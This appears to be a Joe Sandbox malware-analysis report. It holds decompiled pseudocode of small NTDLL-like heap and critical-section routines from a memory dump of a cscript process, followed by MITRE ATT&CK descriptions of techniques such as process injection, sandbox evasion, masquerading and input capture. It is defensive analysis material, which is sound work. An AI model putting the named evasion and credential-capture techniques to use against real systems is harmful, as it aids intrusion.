Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2d087660877497caee8dda95ff4428625a086b1b0af6c0363ff70291142e5a
Instruction ID: be08cdb2864b73125ef2bd004d339a515d8b0a83b00dc3fe8cb84252d7443961
Opcode Fuzzy Hash: cb2d087660877497caee8dda95ff4428625a086b1b0af6c0363ff70291142e5a
Instruction Fuzzy Hash: DAE068B4204280BFC734D711D048FB63F9BFBC2228F0984CFE00807A01C229D944C205

Uniqueness

Uniqueness Score: -1.00%

Function 055441E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E055441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x55908f0);
				_t5 = E0550D08C(__ebx, __edi, __esi);
				if( *0x55a87ec == 0) {
					E054CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x55a87ec == 0) {
						 *0x55a87f0 = 0x55a87ec;
						 *0x55a87ec = 0x55a87ec;
						 *0x55a87e8 = 0x55a87e4;
						 *0x55a87e4 = 0x55a87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05544248();
				}
				return E0550D0D1(_t5);
			}

0x055441e8
0x055441ea
0x055441ef
0x055441fb
0x05544206
0x0554420b
0x05544216
0x0554421d
0x05544222
0x0554422c
0x05544231
0x05544231
0x05544236
0x0554423d
0x0554423d
0x05544247

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e8c7e86807a93399c2fe488d2213a4d5bb4d56c5c69bb677e5836e3cd79635
Instruction ID: cf4ebfc17261b15023ce99caf16efb4a0682386c131c182bbd758e62cd690c84
Opcode Fuzzy Hash: 51e8c7e86807a93399c2fe488d2213a4d5bb4d56c5c69bb677e5836e3cd79635
Instruction Fuzzy Hash: 2EF03979A70700CFCBAAEFA9D50A7183AF4F784314F40415BE104A7284DB364589EF01

Uniqueness

Uniqueness Score: -1.00%

Function 0556D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0556D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L054BE8B0(__ecx, _a4, 0xfff);
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0556d38a
0x0556d39b
0x0556d3b1
0x00000000
0x0556d3b6
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 1e35b02cdc02e4b02defc440bdce4086f2037696be0eb670fc1bea59d84342ea
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 12E0C232380644BBEB225E44CC00FF9BB2AEB507A0F104836FE085B690C671ACA1D6D4

Uniqueness

Uniqueness Score: -1.00%

Function 054EA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054EA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x55a67e4 >= 0xa) {
					if(_t5 < 0x55a6800 || _t5 >= 0x55a6900) {
						return L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E054D0010(0x55a67e0, _t5);
				}
			}

0x054ea190
0x054ea1a6
0x054ea1c2
0x00000000
0x00000000
0x00000000
0x054ea192
0x054ea192
0x054ea19f
0x054ea19f

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ba5ff01f4f030921c9fa43a1c208c14ab07f4884dbcf5fbd9707aa8df5e91c8
Instruction ID: 2b4103697e367fff2826e49f9cdf97c76be44b76cc4dc1817c06077ea97bd649
Opcode Fuzzy Hash: 0ba5ff01f4f030921c9fa43a1c208c14ab07f4884dbcf5fbd9707aa8df5e91c8
Instruction Fuzzy Hash: 60D02B226300007AC62E97029EACBF9B2A2F780701FB9480FF1074B590ED50C8D49119

Uniqueness

Uniqueness Score: -1.00%

Function 054E16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054E16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E054E1710(0x55a67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L054D4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x054e16e8
0x054e16ef
0x054e16f3
0x054e16fe
0x00000000
0x054e1700
0x054e170d
0x054e170d
0x054e16f2
0x054e16f2
0x054e16f2
0x054e16f2

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51badff4d494863f04843e286623ece67befe37995a22d2468d98a6e925ca95b
Instruction ID: cb1fc4ca70211c7f197ead57490aa90934ea3ef174580d8a1b5b24bdf82f749a
Opcode Fuzzy Hash: 51badff4d494863f04843e286623ece67befe37995a22d2468d98a6e925ca95b
Instruction Fuzzy Hash: 8FD0A73138010053DE2D5F21D858B592261FB84B82F38109EF1074A9D0CFB5CC92E058

Uniqueness

Uniqueness Score: -1.00%

Function 055353CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E055353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E054CEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x055353ca
0x055353ce
0x055353d9
0x055353de
0x055353e1
0x055353e1
0x055353e6
0x055353f3
0x00000000
0x055353f8
0x055353fb

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 3a11953c0250fbb600b52c785435ebf582fe7b8d2197ccd320ac370b46e2242b
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 9CE08C32A046809BCF12DF49C654F9EB7F9FB84B00F140459A0095B620C634AC00CB10

Uniqueness

Uniqueness Score: -1.00%

Function 054E35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054E35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E054CEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x054e35a1
0x054e35a1
0x054e35a5
0x054e35ab
0x054e35ab
0x054e35b5
0x00000000
0x054e35c1
0x054e35b7

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 61f2c151b7310753e21091f6568d7b0eb5f8f8a6a2993a3744a9854c3c931cdb
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 18D05231605180DADB43EF10C218BF937A2BB0030BF5828EB800207B52832A6A1B8700

Uniqueness

Uniqueness Score: -1.00%

Function 054CAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054CAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x054caab6
0x054caabb
0x0551a442
0x00000000
0x0551a448
0x0551a454
0x0551a454
0x054caac1
0x054caac1
0x054caac6
0x054caac6

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 09c4f952a62090be652a759af57732092a47f9b4e41e494213e69f156790f182
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: CCD0C939352980CFD617CB0DC554F1637A4BB44B44FC504D0E801CB721E62DD940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0553A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0553A537(intOrPtr _a4, intOrPtr _a8) {

				return L054D8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0553a553

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 02aad6b58201b0ec0e43c37d38af1f25927ed12d282b98f036eeda4f5d9729df
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 23C08C33180248BBCB126F82CC00F56BF6AFB94B60F008015FA080B570C632E970EB94

Uniqueness

Uniqueness Score: -1.00%

Function 054BDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054BDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L054D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x054bdb4d
0x054bdb54
0x054bdb5f
0x054bdb56
0x054bdb56
0x054bdb5c
0x054bdb5c

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: cf0606b4b9cffb40f18dd1d974dadabc56f88084d9199008f45cd20e9ccb8055
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: FDC08C30380A00AAEB221F20CD11B8176A0BB00B05F4400E16302DA4F0DBBDD801E620

Uniqueness

Uniqueness Score: -1.00%

Function 054BAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054BAD30(intOrPtr _a4) {

				return L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x054bad49

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: afff8dba1201f87b3eab0fd327029363e132c5b159e8942e3e8f41990f0f3403
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 7FC08C32180248BBC7126A46CD00F01BB29E790B60F000022B6040A6618932E860D598

Uniqueness

Uniqueness Score: -1.00%

Function 054E36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054E36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x054e36d2
0x054e36e8
0x054e36d4
0x054e36e5
0x054e36e5

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: da278632a823a2d7afed3c0c10673c0443988641ac853cdd5c30e022ab3659a6
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 1AC02B70350440BBDB261F30CD50F59B254F700A22F6407987221479F0D57DAC00D100

Uniqueness

Uniqueness Score: -1.00%

Function 054C76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054C76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x054c76e4
0x00000000
0x054c76f8
0x054c76fd

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: b68542b21f886bb93b723aaa4d977faed132c724d01ed814a0be9650911daa82
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 73C08C783411805BEB6A5708CE26F727A50FB48718F8801DEAA020A6A1C368B802CA08

Uniqueness

Uniqueness Score: -1.00%

Function 054D3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054D3A1C(intOrPtr _a4) {
				void* _t5;

				return L054D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x054d3a35

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: bdc0c0d89687f6b13d842c5d233bd09268689c9f67e014373f00900d46628260
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 57C08C32180248BBCB126E42DC00F01BB29E790B60F000021B6040B9608576EC60D598

Uniqueness

Uniqueness Score: -1.00%

Function 054D7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054D7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x054d7d56
0x054d7d5b
0x054d7d60
0x054d7d5d
0x054d7d5d
0x054d7d5d

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: aa08e4063c04944871befc0aebb23e23f358ebf9aa01695c4ff6ce3bfa3f0866
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 59B092343019408FCE16DF18C094F6673E4FB45A40B8400D4E400CBA20D229E8008A00

Uniqueness

Uniqueness Score: -1.00%

Function 054E2ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054E2ACB() {
				void* _t5;

				return E054CEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x054e2adc

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: bf4a6dff9831de0e8d76c4f3f70e04901810174f64f44328f0c2e5c39724f840
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 1EB01232D10440CFCF43EF40C614B697735FB40750F0544D9900127930C328AC11CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0554FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0554FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E054FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05545720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05545720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0554fdda
0x0554fde2
0x0554fde5
0x0554fdec
0x0554fdfa
0x0554fdff
0x0554fe0a
0x0554fe0f
0x0554fe17
0x0554fe1e
0x0554fe19
0x0554fe19
0x0554fe19
0x0554fe20
0x0554fe21
0x0554fe22
0x0554fe25
0x0554fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0554FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0554FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0554FE01

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 976516ee5190406f870d510df21f5f12ceda5e0ceb607157cd4470fc5c66990b
Instruction ID: 8000a972c8512da48ec1de59246e2fcf2dbdb40f3d7b30b4a6756078bb912537
Opcode Fuzzy Hash: 976516ee5190406f870d510df21f5f12ceda5e0ceb607157cd4470fc5c66990b
Instruction Fuzzy Hash: 66F0F636244201BFE6241A49DC46F63BB6AFB84770F244315F628565D1EAA2F8309BF0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

